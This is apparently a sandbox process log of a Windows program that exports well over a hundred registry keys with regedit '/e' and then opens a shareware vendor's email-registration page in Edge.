/e "827.reg" "HKEY_CLASSES_ROOT\Interface\{08A9E040-9A9C-4F42-B5F5-2029B8F17E1D}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "828.reg" "HKEY_CLASSES_ROOT\Interface\{066ACBCA-8881-49C9-BB98-FAE16B4889E1}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "829.reg" "HKEY_CLASSES_ROOT\Interface\{0776ae27-5ab9-4e18-9063-1836da63117a}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "830.reg" "HKEY_CLASSES_ROOT\Interface\{10C9242E-D604-49B5-99E4-BF87945EF86C}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "831.reg" "HKEY_CLASSES_ROOT\Interface\{000C172F-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "832.reg" "HKEY_CLASSES_ROOT\Interface\{000C1731-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "833.reg" "HKEY_CLASSES_ROOT\Interface\{000C1728-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "834.reg" "HKEY_CLASSES_ROOT\Interface\{000C1730-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "835.reg" "HKEY_CLASSES_ROOT\Interface\{143C8DCB-D37F-47F7-88E8-6B1D21F2C5F7}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "836.reg" "HKEY_CLASSES_ROOT\Interface\{14E469E0-BF61-11CF-8385-8F69D8F1350B}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "837.reg" "HKEY_CLASSES_ROOT\Interface\{1196AE48-D92B-4BC7-85DE-664EC3F761F1}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "838.reg" "HKEY_CLASSES_ROOT\Interface\{1196AE48-D92B-4BC7-85DE-664EC3F761F1}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "839.reg" "HKEY_CLASSES_ROOT\Interface\{000C172E-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "840.reg" "HKEY_CLASSES_ROOT\Interface\{000C172D-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "841.reg" "HKEY_CLASSES_ROOT\Interface\{10EF4AB3-4FAA-46C3-8832-B6247F0CF15C}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "842.reg" "HKEY_CLASSES_ROOT\Interface\{10EF4AB3-4FAA-46C3-8832-B6247F0CF15C}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "843.reg" "HKEY_CLASSES_ROOT\Interface\{000C172A-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "844.reg" "HKEY_CLASSES_ROOT\Interface\{000C1729-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "845.reg" "HKEY_CLASSES_ROOT\Interface\{000C172C-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "846.reg" "HKEY_CLASSES_ROOT\Interface\{000C172B-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "847.reg" "HKEY_CLASSES_ROOT\Interface\{02C98E2C-6C9F-49F8-9B57-3A6E1AA09A67}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "848.reg" "HKEY_CLASSES_ROOT\Interface\{000CD902-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "849.reg" "HKEY_CLASSES_ROOT\Interface\{000CD903-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "850.reg" "HKEY_CLASSES_ROOT\Interface\{000CD900-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "851.reg" "HKEY_CLASSES_ROOT\Interface\{000CD901-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "852.reg" "HKEY_CLASSES_ROOT\Interface\{000CDB02-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "853.reg" "HKEY_CLASSES_ROOT\Interface\{000CDB03-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "854.reg" "HKEY_CLASSES_ROOT\Interface\{000CDB00-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "855.reg" "HKEY_CLASSES_ROOT\Interface\{000CDB01-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "856.reg" "HKEY_CLASSES_ROOT\Interface\{000CD102-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "857.reg" "HKEY_CLASSES_ROOT\Interface\{000CD6A1-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "858.reg" "HKEY_CLASSES_ROOT\Interface\{000CD100-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "859.reg" "HKEY_CLASSES_ROOT\Interface\{000CD101-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "860.reg" "HKEY_CLASSES_ROOT\Interface\{000CD706-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "861.reg" "HKEY_CLASSES_ROOT\Interface\{000CD809-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "862.reg" "HKEY_CLASSES_ROOT\Interface\{000CD6A2-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "863.reg" "HKEY_CLASSES_ROOT\Interface\{000CD6A3-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "864.reg" "HKEY_CLASSES_ROOT\Interface\{000CDB04-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "865.reg" "HKEY_CLASSES_ROOT\Interface\{00F20E90-2168-4CAB-A8E0-C7D0029965E6}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "866.reg" "HKEY_CLASSES_ROOT\Interface\{00FFD6C4-1A94-44BC-AD3E-8AC18552E3E6}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "867.reg" "HKEY_CLASSES_ROOT\Interface\{000CDB10-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "868.reg" "HKEY_CLASSES_ROOT\Interface\{00194002-D9C3-11D3-8D59-0050048384E3}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "869.reg" "HKEY_CLASSES_ROOT\Interface\{0299ECA9-80B6-43C8-A79A-FB1C5F19E7D8}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "870.reg" "HKEY_CLASSES_ROOT\Interface\{02C98E2C-6C9F-49F8-9B57-3A6E1AA09A67}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "871.reg" "HKEY_CLASSES_ROOT\Interface\{00FFD6C4-1A94-44BC-AD3E-8AC18552E3E6}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "872.reg" "HKEY_CLASSES_ROOT\Interface\{0299ECA9-80B6-43C8-A79A-FB1C5F19E7D8}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "873.reg" "HKEY_CLASSES_ROOT\Interface\{000CDB07-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "874.reg" "HKEY_CLASSES_ROOT\Interface\{000CDB09-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "875.reg" "HKEY_CLASSES_ROOT\Interface\{000CDB05-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "876.reg" "HKEY_CLASSES_ROOT\Interface\{000CDB06-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "877.reg" "HKEY_CLASSES_ROOT\Interface\{000CDB0E-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "878.reg" "HKEY_CLASSES_ROOT\Interface\{000CDB0F-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "879.reg" "HKEY_CLASSES_ROOT\Interface\{000CDB0A-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "880.reg" "HKEY_CLASSES_ROOT\Interface\{000CDB0B-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "881.reg" "HKEY_CLASSES_ROOT\Interface\{22A68885-0FD9-42F6-9DED-4FB174DC7344}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "882.reg" "HKEY_CLASSES_ROOT\Interface\{214685F6-7B78-4681-87E0-495F739273D1}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "883.reg" "HKEY_CLASSES_ROOT\Interface\{2387C6BD-9A36-41A2-88ED-FF731E529384}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "884.reg" "HKEY_CLASSES_ROOT\Interface\{22A68885-0FD9-42F6-9DED-4FB174DC7344}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "885.reg" "HKEY_CLASSES_ROOT\Interface\{2072838A-316F-467A-A949-27F68C44A854}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "886.reg" "HKEY_CLASSES_ROOT\Interface\{2A792539-9CEA-4A63-A80A-A645FEF2046A}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "887.reg" "HKEY_CLASSES_ROOT\Interface\{1EDD003E-C446-43C5-8BA0-3778CC4792CC}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "888.reg" "HKEY_CLASSES_ROOT\Interface\{2A792539-9CEA-4A63-A80A-A645FEF2046A}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "889.reg" "HKEY_CLASSES_ROOT\Interface\{1F6342F2-D848-42E3-8995-C10A9EF9A3BA}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "890.reg" "HKEY_CLASSES_ROOT\Interface\{2692D1F2-2C7C-4AE0-8E73-8F37736C912D}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "891.reg" "HKEY_CLASSES_ROOT\Interface\{2692D1F2-2C7C-4AE0-8E73-8F37736C912D}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "892.reg" "HKEY_CLASSES_ROOT\Interface\{24785B20-135E-11D1-A2A7-00A0C9082766}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "893.reg" "HKEY_CLASSES_ROOT\Interface\{24785B20-135E-11D1-A2A7-00A0C9082766}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "894.reg" "HKEY_CLASSES_ROOT\Interface\{2A1C53C4-8638-4B3E-B518-2773C94556A3}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "895.reg" "HKEY_CLASSES_ROOT\Interface\{239D58CC-793C-4B64-8320-B51380087C0B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "896.reg" "HKEY_CLASSES_ROOT\Interface\{2387C6BD-9A36-41A2-88ED-FF731E529384}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "897.reg" "HKEY_CLASSES_ROOT\Interface\{24785B20-135E-11D1-A2A7-00A0C9082766}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "898.reg" "HKEY_CLASSES_ROOT\Interface\{23ADBB16-0133-4906-B29A-1DCE1D026379}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "899.reg" "HKEY_CLASSES_ROOT\Interface\{1B71F23B-E61F-45C9-83BA-235D55F50CF9}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "900.reg" "HKEY_CLASSES_ROOT\Interface\{1B71F23B-E61F-45C9-83BA-235D55F50CF9}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "901.reg" "HKEY_CLASSES_ROOT\Interface\{1b7aed4f-fcaf-4da4-8795-c03e635d8edc}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "902.reg" "HKEY_CLASSES_ROOT\Interface\{2D719729-5333-406C-BF12-8DE787FD65E3}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "903.reg" "HKEY_CLASSES_ROOT\Interface\{198F17AE-B921-4308-9543-288D426A5C2B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "904.reg" "HKEY_CLASSES_ROOT\Interface\{18987285-971B-4C88-AEA9-2A5600861BA5}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "905.reg" "HKEY_CLASSES_ROOT\Interface\{14E469E0-BF61-11CF-8385-8F69D8F1350B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "906.reg" "HKEY_CLASSES_ROOT\Interface\{198F17AE-B921-4308-9543-288D426A5C2B}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "907.reg" "HKEY_CLASSES_ROOT\Interface\{18987285-971B-4C88-AEA9-2A5600861BA5}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "908.reg" "HKEY_CLASSES_ROOT\Interface\{2CE46480-1A08-11CF-AD63-00AA00614F3E}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "909.reg" "HKEY_CLASSES_ROOT\Interface\{1E9B00E4-9846-11D1-A1EE-00C04FC2FBE1}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "910.reg" "HKEY_CLASSES_ROOT\Interface\{2CE46480-1A08-11CF-AD63-00AA00614F3E}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "911.reg" "HKEY_CLASSES_ROOT\Interface\{1EDD003E-C446-43C5-8BA0-3778CC4792CC}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "912.reg" "HKEY_CLASSES_ROOT\Interface\{2CE4D4CF-B278-4126-AD1E-B622DA2E8339}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "913.reg" "HKEY_CLASSES_ROOT\Interface\{1b7aed4f-fcaf-4da4-8795-c03e635d8edc}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "914.reg" "HKEY_CLASSES_ROOT\Interface\{2CE4D4CF-B278-4126-AD1E-B622DA2E8339}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "915.reg" "HKEY_CLASSES_ROOT\Interface\{1D12BD3F-89B6-4077-AA2C-C9DC2BCA42F9}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "916.reg" "HKEY_CLASSES_ROOT\Interface\{2CE4D4CF-B278-4126-AD1E-B622DA2E8339}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "917.reg" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SharedDLLs"

C:\Windows\SysWOW64\regedit.exe

/e "918.reg" "HKEY_LOCAL_MACHINE\Software\Microsoft\MMC\SnapIns\FX:{b05566ae-fe9c-4363-be05-7a4cbb7cb510}"

C:\Windows\SysWOW64\regedit.exe

/e "919.reg" "HKEY_LOCAL_MACHINE\Software\Microsoft\MMC\SnapIns\FX:{b05566ad-fe9c-4363-be05-7a4cbb7cb510}"

C:\Windows\SysWOW64\regedit.exe

/e "920.reg" "HKEY_LOCAL_MACHINE\Software\Microsoft\MMC\SnapIns\FX:{c7b8fb07-bfe1-4c2e-9217-7a69a95bbac4}"

C:\Windows\SysWOW64\regedit.exe

/e "921.reg" "HKEY_LOCAL_MACHINE\Software\Microsoft\MMC\SnapIns\FX:{c7b8fb06-bfe1-4c2e-9217-7a69a95bbac4}"

C:\Windows\SysWOW64\regedit.exe

/e "922.reg" "HKEY_LOCAL_MACHINE\Software\Microsoft\MMC\SnapIns\FX:{7d3830aa-e69e-4e17-8bd1-1b87b97099da}"

C:\Windows\SysWOW64\regedit.exe

/e "923.reg" "HKEY_LOCAL_MACHINE\Software\Microsoft\MMC\SnapIns\FX:{b05566ac-fe9c-4368-be01-7a4cbb6cba12}"

C:\Windows\SysWOW64\regedit.exe

/e "924.reg" "HKEY_LOCAL_MACHINE\Software\Microsoft\MMC\SnapIns\FX:{b05566ac-fe9c-4368-be02-7a4cbb7cbe11}"

C:\Windows\SysWOW64\regedit.exe

/e "925.reg" "HKEY_LOCAL_MACHINE\Software\Microsoft\MMC\SnapIns\FX:{b05566ac-fe9c-4368-be01-7a4cbb6cba13}"

C:\Windows\SysWOW64\regedit.exe

/e "926.reg" "HKEY_CLASSES_ROOT\Extensions\ContractId\Windows.Protocol\PackageId\Windows.PrintDialog_6.2.1.0_neutral_neutral_cw5n1h2txyewy\ActivatableClassId\Microsoft.Windows.PrintDialog.AppXw37yn3dbfh0h80cd54t676ex3d8ew3wk.mca"

C:\Windows\SysWOW64\regedit.exe

/e "927.reg" "HKEY_CLASSES_ROOT\Extensions\ContractId\Windows.Protocol\PackageId\Windows.PrintDialog_6.2.1.0_neutral_neutral_cw5n1h2txyewy\ActivatableClassId\Microsoft.Windows.PrintDialog.AppXqnst4nt1wwwjx56bzf1wpwyn56fzmp3d.mca"

C:\Windows\SysWOW64\regedit.exe

/e "928.reg" "HKEY_CLASSES_ROOT\Extensions\ContractId\Windows.BackgroundTasks\PackageId\Windows.PrintDialog_6.2.1.0_neutral_neutral_cw5n1h2txyewy\ActivatableClassId\Microsoft.Windows.PrintDialog.AppX6fe08qd05jq9n5xymcarszkywdk3r16w.mca"

C:\Windows\SysWOW64\regedit.exe

/e "929.reg" "HKEY_CLASSES_ROOT\Extensions\ContractId\Windows.BackgroundTasks\PackageId\Windows.PrintDialog_6.2.1.0_neutral_neutral_cw5n1h2txyewy\ActivatableClassId\Microsoft.Windows.PrintDialog.AppXskcrzs22qh136w607wsfv5z9v35zx4r5.mca"

C:\Windows\SysWOW64\regedit.exe

/e "930.reg" "HKEY_CLASSES_ROOT\Extensions\ContractId\Windows.BackgroundTasks\PackageId\Windows.PrintDialog_6.2.1.0_neutral_neutral_cw5n1h2txyewy\ActivatableClassId\Microsoft.Windows.PrintDialog.AppXv42rtrb1mc702dzsntwk7td5q0r8d235.mca"

C:\Windows\SysWOW64\regedit.exe

/e "931.reg" "HKEY_CURRENT_USER\Software\Microsoft\OneDrive\18.151.0729.0013"

C:\Windows\SysWOW64\regedit.exe

/e "932.reg" "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}"

C:\Windows\SysWOW64\regedit.exe

/e "933.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.MicrosoftEdge_44.22000.120.0_neutral__8wekyb3d8bbwe\Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge\windows.protocol\http"

C:\Windows\SysWOW64\regedit.exe

/e "934.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.MicrosoftEdge_44.22000.120.0_neutral__8wekyb3d8bbwe\Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge\windows.protocol\https"

C:\Windows\SysWOW64\regedit.exe

/e "935.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.WindowsFeedbackHub_1.2103.1172.0_x64__8wekyb3d8bbwe\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe!App\windows.fileTypeAssociation\.fh"

C:\Windows\SysWOW64\regedit.exe

/e "936.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.MicrosoftEdge_44.22000.120.0_neutral__8wekyb3d8bbwe\Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge\windows.fileTypeAssociation\.svg"

C:\Windows\SysWOW64\regedit.exe

/e "937.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.MicrosoftEdge_44.22000.120.0_neutral__8wekyb3d8bbwe\Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge\windows.protocol\read"

C:\Windows\SysWOW64\regedit.exe

/e "938.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.MicrosoftEdge_44.22000.120.0_neutral__8wekyb3d8bbwe\Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge\windows.protocol\ms-xbl-3d8b930f"

C:\Windows\SysWOW64\regedit.exe

/e "939.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.MicrosoftEdge_44.22000.120.0_neutral__8wekyb3d8bbwe\Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge\windows.protocol\microsoft-edge"

C:\Windows\SysWOW64\regedit.exe

/e "940.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.MicrosoftEdge_44.22000.120.0_neutral__8wekyb3d8bbwe\Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge\windows.protocol\microsoft-edge-holographic"

C:\Windows\SysWOW64\regedit.exe

/e "941.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Windows.PrintDialog_6.2.1.0_neutral_neutral_cw5n1h2txyewy\Windows.PrintDialog_cw5n1h2txyewy!Microsoft.Windows.PrintDialog\windows.protocol\ms-print-printjobs"

C:\Windows\SysWOW64\regedit.exe

/e "942.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Windows.PrintDialog_6.2.1.0_neutral_neutral_cw5n1h2txyewy\Windows.PrintDialog_cw5n1h2txyewy!Microsoft.Windows.PrintDialog\windows.protocol\ms-print-addprinter"

C:\Windows\SysWOW64\regedit.exe

/e "943.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.MicrosoftEdge_44.22000.120.0_neutral__8wekyb3d8bbwe\Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge\windows.fileTypeAssociation\.htm"

C:\Windows\SysWOW64\regedit.exe

/e "944.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.MicrosoftEdge_44.22000.120.0_neutral__8wekyb3d8bbwe\Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge\windows.fileTypeAssociation\.pdf"

C:\Windows\SysWOW64\regedit.exe

/e "945.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.MicrosoftEdge_44.22000.120.0_neutral__8wekyb3d8bbwe\Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge\windows.fileTypeAssociation\.html"

C:\Windows\SysWOW64\regedit.exe

/e "946.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.DesktopAppInstaller_1.0.42251.0_neutral_split.scale-125_8wekyb3d8bbwe"

C:\Windows\SysWOW64\regedit.exe

/e "947.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.Getstarted_10.2.41172.0_neutral_split.scale-200_8wekyb3d8bbwe"

C:\Windows\SysWOW64\regedit.exe

/e "948.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.Getstarted_10.2.41172.0_neutral_split.scale-125_8wekyb3d8bbwe"

C:\Windows\SysWOW64\regedit.exe

/e "949.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.XboxGamingOverlay_2.50.24002.0_neutral_split.scale-125_8wekyb3d8bbwe"

C:\Windows\SysWOW64\regedit.exe

/e "950.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.WindowsStore_12104.1001.1.0_neutral_split.scale-125_8wekyb3d8bbwe"

C:\Windows\SysWOW64\regedit.exe

/e "951.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.YourPhone_0.19051.7.0_neutral_split.scale-125_8wekyb3d8bbwe"

C:\Windows\SysWOW64\regedit.exe

/e "952.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.ZuneVideo_10.21012.10511.0_neutral_split.scale-125_8wekyb3d8bbwe"

C:\Windows\SysWOW64\regedit.exe

/e "953.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.ZuneMusic_10.21012.10511.0_neutral_split.scale-125_8wekyb3d8bbwe"

C:\Windows\SysWOW64\regedit.exe

/e "954.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.WindowsNotepad_10.2102.13.0_neutral_split.scale-125_8wekyb3d8bbwe"

C:\Windows\SysWOW64\regedit.exe

/e "955.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.ScreenSketch_11.2104.2.0_neutral_split.scale-125_8wekyb3d8bbwe"

C:\Windows\SysWOW64\regedit.exe

/e "956.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.Paint_10.2104.17.0_neutral_split.scale-125_8wekyb3d8bbwe"

C:\Windows\SysWOW64\regedit.exe

/e "957.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.Windows.Photos_21.21030.25003.0_neutral_split.scale-125_8wekyb3d8bbwe"

C:\Windows\SysWOW64\regedit.exe

/e "958.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.WindowsCamera_2020.503.58.0_neutral_split.scale-200_8wekyb3d8bbwe"

C:\Windows\SysWOW64\regedit.exe

/e "959.reg" "HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.WindowsCamera_2020.503.58.0_neutral_split.scale-125_8wekyb3d8bbwe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.sharewareonline.com/emailentry.aspx?referrer=SOREF_NOTAVAIL&pid=8D-E9-5A-CB-DC-60-C5-00&INSTALLDATE=08092024

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ff90fa83cb8,0x7ff90fa83cc8,0x7ff90fa83cd8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

